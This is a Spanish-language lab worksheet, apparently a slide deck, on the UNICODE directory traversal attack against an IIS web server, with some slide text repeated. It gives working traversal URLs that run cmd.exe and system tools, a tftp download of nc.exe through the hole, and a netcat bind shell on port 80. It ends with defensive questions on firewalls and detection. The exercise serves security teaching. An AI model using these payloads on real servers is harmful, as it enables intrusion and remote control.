  • 2. 8. Desde el cliente haga un telnet al servidor por el puerto 80. ¿Qué comando ha utilizado? Pulse “enter” dos veces consecutivamente. ¿Qué mensaje muestra la salida de este comando? ¿Qué tipo y versión de servidor web está en ejecución en el servidor? 9. Busque en Internet información sobre el ataque UNICODE y descríbalo. ¿Se ajusta este ataque al escenario planteado? 10. Ataque: a. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/cmd.exe?+/c+dir+c: ¿Qué muestra el servidor? b. Desde el navegador del cliente ir a Ataque UNICODE Francesc Pérez Fdez. b. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/ipconfig.exe?+/all ¿Qué muestra el servidor? c. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view ¿Qué muestra el servidor? d. Cree una carpeta compartida en el servidor. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/net.exe?+view+IP_SER VER ¿Qué muestra el servidor? e. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/nbtstat.exe?+"- a"+IP_SERVER ¿Qué muestra el servidor?
  • 3. 10. Ataque: f. Instale el servidor TFTP en el cliente y copie en la carpeta el programa nc.exe que nos permitirá tener una shell remota en el servidor. g. Desde el navegador del cliente ir a http://IP_SERVER/scripts/..%c0%af../windows/system32/tftp.exe?"- i"+IP_CLIENTE+GET+nc.exe ¿Qué muestra el servidor? ¿Qué hemos hecho en este paso? Mire el contenido de la carpeta C:/Inetpub/scripts. Copie el resto de archivos de la carpeta de nc11nt, en caso contrario no funcionará! h. Ejecutaremos de forma remota la herramienta nc.exe desde el cliente. Para ello ir al navegador del cliente e introducir en la URL http://IP_SERVER/scripts/nc.exe?- l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el Ataque UNICODE Francesc Pérez Fdez. l+-p+80+-t+-e+cmd.exe Especificamos que la conexión se realice mediante el puerto 80, que se quede en modo listening (esperando conexión entrante) y que después de la conexión se ejecute el programa cmd.exe i. Desde un cmd del cliente ejecute “nc IP_SERVER 80”. ¿Qué muestra la salida de dicho comando? ¿Dónde se encuentra? 11. ¿Solucionaría poner un firewall entre el cliente y el servidor? Explique por qué. 12. Dibuje con Edraw o Visio una arquitectura de red con los dispositivos software y hardware necesarios para crear un acceso seguro al servidor un detectar ataques UNICODE. Explique la función de cada elemento.